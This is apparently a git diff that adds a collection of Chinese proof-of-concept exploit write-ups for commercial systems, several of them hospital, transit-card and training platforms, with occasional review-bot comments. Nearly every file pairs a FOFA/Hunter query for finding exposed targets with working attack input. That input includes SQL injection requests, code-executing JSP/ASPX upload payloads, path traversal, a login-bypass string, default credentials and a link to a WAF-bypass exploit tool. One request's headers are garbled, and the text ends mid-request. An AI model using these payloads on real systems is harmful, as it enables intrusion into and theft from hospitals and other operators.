@@ -0,0 +1,35 @@ +# 公交IC卡收单管理系统user存在SQL注入漏洞 + +# 一、漏洞简介 +公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分,它通过集成先进的集成电路技术(IC卡)实现了乘客便捷的支付方式,并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块,为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验,还降低了公交公司的运营成本,提高了管理效率。公交IC卡收单管理系统user存在SQL注入漏洞。经过身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +# 二、影响版本 ++ 公交IC卡收单管理系统 + +# 三、资产测绘 ++ fofa`app="公交IC卡收单管理系统"` ++ 特征 + +![1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5.png](./img/VRig3DHEJTaUgT5w/1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5-035673.png) + +# 四、漏洞复现 +```java +POST /assets/..;/user HTTP/1.1 +Host: +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +_search=false&nd=1727245865182&rowCountPerPage=10&pageNo=1&sidx=USER_NAME&sord=asc&method=select&USER_NAME=1');WAITFOR DELAY '0:0:5'--&REAL_NAME=1&ACCOUNT_EXPIRE_TIME=%E5%BF%BD%E7%95%A5&PASSWORD_EXPIRE_TIME=%E5%BF%BD%E7%95%A5 +``` + +![1727274189580-15d07235-6ddc-4c09-9a8e-60cac84cbade.png](./img/VRig3DHEJTaUgT5w/1727274189580-15d07235-6ddc-4c09-9a8e-60cac84cbade-972134.png) + + + +> 更新: 2024-10-22 09:36:09 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cvq02glzy3c27bkm> \ No newline at end of file diff --git a/公交IC卡收单管理系统user存在信息泄露漏洞.md b/公交IC卡收单管理系统user存在信息泄露漏洞.md new file mode 100644 index 0000000..03ba0d5 --- /dev/null +++ b/公交IC卡收单管理系统user存在信息泄露漏洞.md 
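Review bot: the five 公交IC卡收单管理系统 SQL injection files (bus, line, parametercard, role, user) differ only in the endpoint and the injected form field (BUS_CODE, LINE_CODE, LINE_CODE, ROLE_NAME, USER_NAME) and share one marketing paragraph; a single advisory with a table of endpoint and parameter would be easier to maintain and would let a defender write one detection or WAF rule for the common method=select grid request instead of five. The user file also carries Chinese text as percent-encoded values (ACCOUNT_EXPIRE_TIME, PASSWORD_EXPIRE_TIME) without saying they are just the UI default "忽略".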
@@ -0,0 +1,41 @@ +# 公交IC卡收单管理系统user存在信息泄露漏洞 + +### 一、漏洞描述 +天津环球磁卡股份有限公司公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分,它通过集成先进的集成电路技术(IC卡)实现了乘客便捷的支付方式,并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块,为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验,还降低了公交公司的运营成本,提高了管理效率。公交IC卡收单管理系统user存在信息泄露漏洞可获取超管用户密码等信息。 + +### 二、影响版本 +公交IC卡收单管理系统 + +### 三、资产测绘 +fofa:app="公交IC卡收单管理系统" + +![1728633619474-822ce325-951c-4d02-bd6a-b92b134a6a8f.webp](./img/EFit_Q9DuN2vcbtT/1728633619474-822ce325-951c-4d02-bd6a-b92b134a6a8f-256840.webp) + +### 四、漏洞复现 +```plain +POST /assets/..;/user HTTP/1.1 +Host: xxx +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept: application/json, text/javascript, */*; q=0.01 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest +Priority: u=0 +Content-Length: 197 + +_search=false&nd=1727275150716&rowCountPerPage=10&pageNo=1&sidx=USER_NAME&sord=asc&method=select&USER_NAME=&REAL_NAME=&ACCOUNT_EXPIRE_TIME=%E5%BF%BD%E7%95%A5&PASSWORD_EXPIRE_TIME=%E5%BF%BD%E7%95%A5 +``` + +执行POC获取超管用户和MD5密码 + +![1728633416844-f4af4914-dc37-4340-a849-0bec4e61ad5c.png](./img/EFit_Q9DuN2vcbtT/1728633416844-f4af4914-dc37-4340-a849-0bec4e61ad5c-096345.png) + +使用获取到的MD5密码进行解密并登录 + +![1728633431240-2c38c0ba-5aba-4b3b-8b18-b9a33567e4c6.png](./img/EFit_Q9DuN2vcbtT/1728633431240-2c38c0ba-5aba-4b3b-8b18-b9a33567e4c6-507494.png) + + + +> 更新: 2024-10-22 09:36:08 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fi2seglgfyashlz8> \ No newline at end of file diff --git a/公交IC卡收单管理系统信息泄露漏洞.md b/公交IC卡收单管理系统信息泄露漏洞.md new file mode 100644 index 0000000..8dadb2b --- /dev/null +++ b/公交IC卡收单管理系统信息泄露漏洞.md 
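Review bot: 公交IC卡收单管理系统user存在信息泄露漏洞.md uses ### for its section headings while every other file uses #, and "使用获取到的MD5密码进行解密" is inaccurate, since an MD5 hash is not decrypted but looked up or cracked; say that. The request is the same /assets/..;/user grid query as the user SQL injection file with empty filters, so the two findings share one root cause (the handler is reachable without a session) and one fix; cross-reference them rather than presenting them as unrelated.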
@@ -0,0 +1,32 @@ +# 公交IC卡收单管理系统信息泄露漏洞 + +公交IC卡收单管理系统信息泄露漏洞,通过泄露的账户密码 登录后台系统。 + +## fofa + +```javascript +app="公交IC卡收单管理系统" +``` + +## poc + + + +```javascript +POST /assets/..;/user HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=B4B300824AA8F075EAC1E702454B91B +AIf-None-Match: W/"8977-1726725363928"If-Modified-Since: Thu, 19 Sep 2024 05:56:03 GMT +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 197 + +_search=false&nd=1727275150716&rowCountPerPage=10&pageNo=1&sidx=USER_NAME&sord=asc&method=select&USER_NAME=&REAL_NAME=&ACCOUNT_EXPIRE_TIME=%E5%BF%BD%E7%95%A5&PASSWORD_EXPIRE_TIME=%E5%BF%BD%E7%95%A5 +``` + +![e00dcd3eb6fcdbc24bef62d405657e5a](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181606738.jpg) \ No newline at end of file diff --git a/公交IC卡收单管理系统存在弱口令漏洞.md b/公交IC卡收单管理系统存在弱口令漏洞.md new file mode 100644 index 0000000..653b204 --- /dev/null +++ b/公交IC卡收单管理系统存在弱口令漏洞.md 
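Review bot: the request headers in 公交IC卡收单管理系统信息泄露漏洞.md are garbled from a wrapped terminal paste: User-Agent and Accept are fused on one line, the Cookie value is split and its last character "A" begins the next line, and If-None-Match and If-Modified-Since run together. The file also duplicates 公交IC卡收单管理系统user存在信息泄露漏洞.md added in the same commit, and the 描述 line has a stray space before 登录后台系统.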
@@ -0,0 +1,25 @@ +# 公交IC卡收单管理系统存在弱口令漏洞 + +# 一、漏洞简介 +公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分,它通过集成先进的集成电路技术(IC卡)实现了乘客便捷的支付方式,并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块,为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验,还降低了公交公司的运营成本,提高了管理效率。公交IC卡收单管理系统存在弱口令漏洞 + +# 二、影响版本 ++ 公交IC卡收单管理系统 + +# 三、资产测绘 ++ fofa`app="公交IC卡收单管理系统"` ++ 特征 + +![1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5.png](./img/5xuQfnVji22ps_P4/1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5-070180.png) + +# 四、漏洞复现 +```java +admin/123456 +``` + +![1727274524899-1cc62599-d132-4f3d-bc1c-4cca81d67551.png](./img/5xuQfnVji22ps_P4/1727274524899-1cc62599-d132-4f3d-bc1c-4cca81d67551-798965.png) + + + +> 更新: 2024-10-22 09:36:09 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ng8rwq4zd0hos38v> \ No newline at end of file diff --git a/兰德网络O2OA存在默认口令漏洞.md b/兰德网络O2OA存在默认口令漏洞.md new file mode 100644 index 0000000..b115384 --- /dev/null +++ b/兰德网络O2OA存在默认口令漏洞.md @@ -0,0 +1,26 @@ +# 兰德网络O2OA 存在默认口令漏洞 + +# 一、漏洞简介 +O2OA是一个基于J2EE分布式架构,集成移动办公、智能办公,支持私有化部署,自适应负载能力的,能够很大程度上节约企业软件开发成本的基于AGPL协议开放源代码的企业信息化系统需求定制开发平台解决方案。O2OA 存在默认口令漏洞 + +# 二、影响版本 ++ O2OA + +# 三、资产测绘 +```plain +app="兰德网络-O2OA" +``` + +![1720675066609-6529d022-0d15-4038-9e2c-77ea7bdaab19.png](./img/OEpi5s7mIByPqKgH/1720675066609-6529d022-0d15-4038-9e2c-77ea7bdaab19-260404.png) + +# 四、漏洞复现 +```http +xadmin/o2 +``` + +![1720675096327-b608f121-b8c1-4d27-b172-b3fed2f0af04.png](./img/OEpi5s7mIByPqKgH/1720675096327-b608f121-b8c1-4d27-b172-b3fed2f0af04-496650.png) + + + +> 更新: 2024-08-12 17:16:00 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gug1y1s89hg9zp3m> \ No newline at end of file diff --git a/内训宝scorm存在任意文件上传漏洞.md b/内训宝scorm存在任意文件上传漏洞.md new file mode 100644 index 0000000..18b6ebf --- /dev/null +++ b/内训宝scorm存在任意文件上传漏洞.md 
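Review bot: the credential pairs in 公交IC卡收单管理系统存在弱口令漏洞.md and 兰德网络O2OA存在默认口令漏洞.md are fenced as ```java and ```http respectively though they are bare user/password strings; use ```plain. Neither file says which version shipped the default, whether the installer forces a change, or whether the vendor has since rotated it, and the O2OA title "兰德网络O2OA 存在默认口令漏洞" has a stray space.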
@@ -0,0 +1,35 @@ +# 内训宝scorm存在任意文件上传漏洞 +​ 北京内训宝科技有限公司是一家国内知名的在线教育基础服务提供商,专注于在线教育基础服务,并开发符合互联网发展潮流的在线教育产品。内寻宝为北京内训宝科技有限公司专门用于培训行业所开发的一款基于java的服务平台。 + +​ 内训宝企业培训平台 upload/scorm 接口存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa +```javascript +body="static/nxb/css" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1735633027515-abcf8dc0-00f2-4a7e-8010-201e8988c38f.png) + +## poc +```rust +POST /upload/scorm HTTP/1.1 +Host: +Referer: +Content-Type: multipart/form-data; boundary=----w80tipyzy4xm9y5cb2zk + +------w80tipyzy4xm9y5cb2zk +Content-Disposition: form-data; name="fileupload"; filename="test.jsp" +Content-Type: application/octet-stream + +<%out.print(111 * 111);%> +------w80tipyzy4xm9y5cb2zk-- +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1735632988296-f27321f3-ff02-4bcd-a588-b842f65bdb95.png) + +```rust +/upload/imgdefault/common/20241231/1735632951571259198.jsp +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1735633008849-1dfcdf5e-404c-44f4-a970-5496683deb8c.png) + diff --git a/分诊叫号后台系统存在任意文件上传漏洞.md b/分诊叫号后台系统存在任意文件上传漏洞.md new file mode 100644 index 0000000..5a24405 --- /dev/null +++ b/分诊叫号后台系统存在任意文件上传漏洞.md 
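Review bot: in 内训宝scorm存在任意文件上传漏洞.md the request and the result path are fenced as ```rust; the description has the typo 内寻宝 for 内训宝 and "未经身份攻击者" is missing 验证. The recorded path /upload/imgdefault/common/20241231/1735632951571259198.jsp is a timestamped instance name; say the server generates it, and record the affected version.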
@@ -0,0 +1,61 @@ +# 分诊叫号后台系统存在任意文件上传漏洞 +北京神州视翰科技有限公司分诊叫号后台系统存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +## fofa + +```javascript +title="分诊叫号后台" +``` + +## poc +```javascript +POST /api/doctor/ HTTP/1.1 +Host: +Content-Length: 756 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKZ5OA1LLddPA4mKc +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: need_login= +Connection: close + +------WebKitFormBoundaryKZ5OA1LLddPA4mKc +Content-Disposition: form-data; name="doctorid" + +0 +------WebKitFormBoundaryKZ5OA1LLddPA4mKc +Content-Disposition: form-data; name="login_id" + +001.aspx +------WebKitFormBoundaryKZ5OA1LLddPA4mKc +Content-Disposition: form-data; name="name" + +22 +------WebKitFormBoundaryKZ5OA1LLddPA4mKc +Content-Disposition: form-data; name="title" + +23 +------WebKitFormBoundaryKZ5OA1LLddPA4mKc +Content-Disposition: form-data; name="department" + +24 +------WebKitFormBoundaryKZ5OA1LLddPA4mKc +Content-Disposition: form-data; name="description" + +------WebKitFormBoundaryKZ5OA1LLddPA4mKc +Content-Disposition: form-data; name="icon"; filename="11.txt" +Content-Type: text/aspx + +<%@ Page Language="C#"%><% Response.Write(111*111);System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %> +------WebKitFormBoundaryKZ5OA1LLddPA4mKc-- +``` 
+![image.png](https://cdn.nlark.com/yuque/0/2024/png/1622799/1713976131743-47c1a359-fac8-4890-a2b5-743c3d445850.png#averageHue=%23e8ecf0&clientId=ufb6cafc5-cf89-4&from=paste&height=812&id=udb9bff50&originHeight=1624&originWidth=3024&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1089367&status=done&style=none&taskId=u68119bb4-e3a1-4437-8755-12ecb261032&title=&width=1512) +文件上传位置 + +``` +/Web/images/001.aspx +``` +![image.png](https://cdn.nlark.com/yuque/0/2024/png/1622799/1713976158425-390fe582-beb0-443a-ad68-6ed075d5ede4.png#averageHue=%23fdfdfd&clientId=ufb6cafc5-cf89-4&from=paste&height=548&id=ud04c290f&originHeight=1096&originWidth=2816&originalType=binary&ratio=2&rotation=0&showTitle=false&size=210193&status=done&style=none&taskId=uaabd67ae-1d19-481d-bda6-76dbed33dec&title=&width=1408) diff --git a/勤云远程稿件处理系统存在SQL注入漏洞.md b/勤云远程稿件处理系统存在SQL注入漏洞.md new file mode 100644 index 0000000..b5bddb4 --- /dev/null +++ b/勤云远程稿件处理系统存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +# 勤云远程稿件处理系统存在SQL注入漏洞 + +勤云远程稿件处理系统 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa +```javascript +body="北京勤云科技" +``` + +## poc +```javascript +GET /burpsuite'if%20db_name(1)='master'%20waitfor%20delay%20'0:0:5'--/article/abstract/1 HTTP/1.1 +Host: +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + +![image-20241227220754753](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272207815.png) \ No newline at end of file diff --git a/北京亚控科技img任意文件读取漏洞.md b/北京亚控科技img任意文件读取漏洞.md new file mode 100644 index 0000000..68f7c9b --- /dev/null +++ b/北京亚控科技img任意文件读取漏洞.md 
@@ -0,0 +1,29 @@ +## 北京亚控科技img任意文件读取漏洞 + +KingPortal客户端开发系统 img 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```javascript +body="/public/javascripts/Common/Util/km_util.js" +``` + +## Hunter + +```javascript +web.title="KingPortal" +``` + +## poc + +```javascript +GET /kingclient/img?imgPath=..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +``` + +![image-20241101191735975](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011917039.png) diff --git a/北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台存在远程命令执行.md b/北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台存在远程命令执行.md new file mode 100644 index 0000000..13333a5 --- /dev/null +++ b/北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台存在远程命令执行.md @@ -0,0 +1,23 @@ +# 北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台存在远程命令执行 + +# 一、漏洞简介 +北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台存在远程命令执行 + +# 二、影响版本 ++ 北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台 + +# 三、资产测绘 ++ hunter`web.body="-- 页面顶部 系统标题在此DIV里面 --"` ++ 特征 + +![1699199871837-15a06846-9583-4bea-a20e-e2025485d5cb.png](./img/Lu50_jtrtRQHC4nl/1699199871837-15a06846-9583-4bea-a20e-e2025485d5cb-687686.png) + +# 四、漏洞复现 +[Strruts2全版本漏洞测试工具17-6过WAF版.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222146639-f33e8db2-860b-488a-b0e6-07d9fb1de254.jar) + +![1699199907986-e5c65b64-a77e-4edc-a794-e428d55fd9e9.png](./img/Lu50_jtrtRQHC4nl/1699199907986-e5c65b64-a77e-4edc-a794-e428d55fd9e9-358960.png) + + + +> 更新: 2024-02-29 23:55:46 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pkp536m7nt5emrgx> \ No newline at end of file diff --git a/北京新网医讯技术有限公司PACS系统web端存在SQL注入漏洞.md b/北京新网医讯技术有限公司PACS系统web端存在SQL注入漏洞.md new file mode 100644 index 0000000..49f50ab 
--- /dev/null +++ b/北京新网医讯技术有限公司PACS系统web端存在SQL注入漏洞.md @@ -0,0 +1,33 @@ +# 北京新网医讯技术有限公司PACS系统web端存在SQL注入漏洞 + +# 一、漏洞简介 +北京新网医讯技术有限公司,公司成立于2000年3月,注册于北京中关村科技园,为国家高新技术企业和中关村高新技术企业(简称为“双高企业”),公司作为软件企业,成为北京软件和信息服务业协会会员。公司专业从事PACS(图像存储与传输系统)和RIS(放射科信息管理系统)的研究、开发工作。北京新网医讯技术有限公司PACS系统web端存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 北京新网医讯技术有限公司PACS系统web端 + +# 三、特征 +![1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd.png](./img/DB_HHURFak5A5lyG/1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd-580884.png) + +# 四、漏洞复现 +```plain +POST / HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 +Connection: close +Upgrade-Insecure-Requests: 1 + +__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=aIvFnTxaMev%2BMuIasFWPO9198V98WVrTouBNTXTfDdlwXSECHrd5D4RQ6ge5pTRoYihFHyOQ1PfpTf5vaxEjyLRsSb73HPQsKfEOglWjAGo%3D&__EVENTVALIDATION=71o1HhunkN1yKTj5EmZeDoRkcgp5eEkODmWMf4usLX6jNBDWUPDiJBL7MyjboG6J9tKBMrpLafBCb7uKUMvQf5D5fJaarcxn0qfuG00MPr%2FuQJ4dDvXykErSvcEapjM99c2NwAq2u065oiyocPT%2FS%2BV%2BfU0lhZSlV5wDem2SrRLB38wmsXsy5dcVI8zEXxxy&TextName=admin'&TextPwd=admin'&BtnLogin=%E7%99%BB%E5%BD%95 +``` + +![1700663680647-0bf946ca-4a2b-4008-af2e-1f668a183750.png](./img/DB_HHURFak5A5lyG/1700663680647-0bf946ca-4a2b-4008-af2e-1f668a183750-414790.png) + + + +> 更新: 2024-04-16 19:35:04 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hifk5gfkmueb2136> \ No newline at end of file diff --git a/北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞.md b/北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞.md new file mode 100644 index 0000000..0cfbec5 --- /dev/null +++ b/北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞.md 
@@ -0,0 +1,23 @@ +# 北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞 + +# 一、漏洞简介 +北京新网医讯技术有限公司,公司成立于2000年3月,注册于北京中关村科技园,为国家高新技术企业和中关村高新技术企业(简称为“双高企业”),公司作为软件企业,成为北京软件和信息服务业协会会员。公司专业从事PACS(图像存储与传输系统)和RIS(放射科信息管理系统)的研究、开发工作。北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞,攻击者可通过该漏洞绕过身份认证进入系统后台。 + +# 二、影响版本 ++ 北京新网医讯技术有限公司PACS系统web端 + +# 三、特征/ +![1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd.png](./img/iGYBrATs1WBZWb9e/1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd-062607.png) + +# 四、漏洞复现 +```plain +用户名:admin' or '1'='1' --+ +密码:任意 +``` + +![1700663454600-5e8b6f4d-383c-490b-b918-104e4bdc237a.png](./img/iGYBrATs1WBZWb9e/1700663454600-5e8b6f4d-383c-490b-b918-104e4bdc237a-136123.png) + + + +> 更新: 2024-02-29 23:55:28 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kxcuo6orgybzgrau> \ No newline at end of file diff --git a/北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞.md b/北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞.md new file mode 100644 index 0000000..922df87 --- /dev/null +++ b/北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞.md @@ -0,0 +1,24 @@ +# 北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞 + +# 一、漏洞简介 +北京新网医讯技术有限公司,公司成立于2000年3月,注册于北京中关村科技园,为国家高新技术企业和中关村高新技术企业(简称为“双高企业”),公司作为软件企业,成为北京软件和信息服务业协会会员。公司专业从事PACS(图像存储与传输系统)和RIS(放射科信息管理系统)的研究、开发工作。北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞,攻击者可通过该漏洞绕过身份认证进入系统后台。 + +# 二、影响版本 ++ 北京新网医讯技术有限公司PACS系统web端 + +# 三、特征 +![1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd.png](./img/3n2XzVVsd5eppHKf/1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd-047803.png) + +# 四、漏洞复现 +访问如下url可绕过身份认证直接进入系统后台 + +```plain +/ClinicList.aspx +``` + +![1700663454600-5e8b6f4d-383c-490b-b918-104e4bdc237a.png](./img/3n2XzVVsd5eppHKf/1700663454600-5e8b6f4d-383c-490b-b918-104e4bdc237a-468929.png) + + + +> 更新: 2024-03-04 10:08:55 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wgez6o568rpccb1f> \ No newline at end of file diff --git a/北京新网医讯技术有限公司云端客服管理系统存在万能密码登录漏洞.md b/北京新网医讯技术有限公司云端客服管理系统存在万能密码登录漏洞.md new file mode 100644 index 0000000..08c807e --- /dev/null +++ b/北京新网医讯技术有限公司云端客服管理系统存在万能密码登录漏洞.md 
@@ -0,0 +1,26 @@ +# 北京新网医讯技术有限公司云端客服管理系统存在万能密码登录漏洞 + +# 一、漏洞简介 +北京新网医讯技术有限公司,公司成立于2000年3月,注册于北京中关村科技园,为国家高新技术企业和中关村高新技术企业(简称为“双高企业”),公司作为软件企业,成为北京软件和信息服务业协会会员。公司专业从事PACS(图像存储与传输系统)和RIS(放射科信息管理系统)的研究、开发工作。北京新网医讯技术有限公司云端客服管理系统存在万能密码登录漏洞。 + +# 二、影响版本 ++ 北京新网医讯技术有限公司云端客服管理系统 + +# 三、资产测绘 ++ hunter`web.body="云端客服管理平台登录"` ++ 特征 + +![1709787073905-2d7599e1-7cfb-4312-b2d8-f6be71af0784.png](./img/Y_MNc902yW0PgTrR/1709787073905-2d7599e1-7cfb-4312-b2d8-f6be71af0784-095232.png) + +# 四、漏洞复现 +```plain +用户名:admin' or '1'='1' --+ +密码:任意 +``` + +![1709787140518-981e086c-2809-4e9f-b235-f5d9f64cde2f.png](./img/Y_MNc902yW0PgTrR/1709787140518-981e086c-2809-4e9f-b235-f5d9f64cde2f-999549.png) + + + +> 更新: 2024-04-20 22:06:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mh17k2gha1lqa0on> \ No newline at end of file diff --git a/北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞.md b/北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞.md new file mode 100644 index 0000000..d7b1135 --- /dev/null +++ b/北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞.md @@ -0,0 +1,25 @@ +# 北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞 + +# 一、漏洞简介 +北京雷石天地电子技术有限公司是一家从事现代宽带技术领域和信息家电领域中嵌入式系统软件的研究与开发应用的公司。 北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞,攻击者可利用该漏洞获取敏感信息。 + +# 二、影响版本 ++ 云视频管理系统 + +# 三、资产测绘 ++ hunter`web.body="/mediaimport/getIsAddData"` ++ 特征 + +![1703061796364-b7ca13da-00a7-4258-b1bc-3ed6412512f1.png](./img/8yIVQ8yg93MZfzTM/1703061796364-b7ca13da-00a7-4258-b1bc-3ed6412512f1-706309.png) + +# 四、漏洞复现 +```java +/servers/listdir?path=../../../../../../etc +``` + +![1703061827191-4bf747a7-ebef-4269-9eb8-6e5eb326c5a6.png](./img/8yIVQ8yg93MZfzTM/1703061827191-4bf747a7-ebef-4269-9eb8-6e5eb326c5a6-211600.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zy632nmy8tt4g795> \ No newline at end of file diff --git a/医疗安全(不良)事件报告系统membersbyid存在信息泄露漏洞.md b/医疗安全(不良)事件报告系统membersbyid存在信息泄露漏洞.md new file mode 100644 index 0000000..64cda2f --- /dev/null +++ b/医疗安全(不良)事件报告系统membersbyid存在信息泄露漏洞.md 
@@ -0,0 +1,40 @@ +# 医疗安全(不良)事件报告系统membersbyid存在信息泄露漏洞 + +# 一、漏洞简介 +鱼尾巴科技专注于医疗质控,为医院提供完整医疗质量解决方案,按照国家卫健委评审标准和中国医院质量安全管理标准,研发了医院等级评审系统、医疗安全(不良)事件报告系统、不良事件管理系统等。其中旗下医疗安全(不良)事件报告系统membersbyid存在信息泄露漏洞,通过该漏洞可获取管理员明文密码进入后台。 + +# 二、影响版本 ++ 医疗安全(不良)事件报告系统 + +# 三、资产测绘 ++ fofa`body="koma.Application"` ++ 特征 + +![1721306769436-e4a4bc7b-dc51-437f-beba-c4aff1c4db63.png](./img/tu4oTq5Iw6KAViO2/1721306769436-e4a4bc7b-dc51-437f-beba-c4aff1c4db63-530940.png) + +# 四、漏洞复现 +```plain +POST /services/members HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, 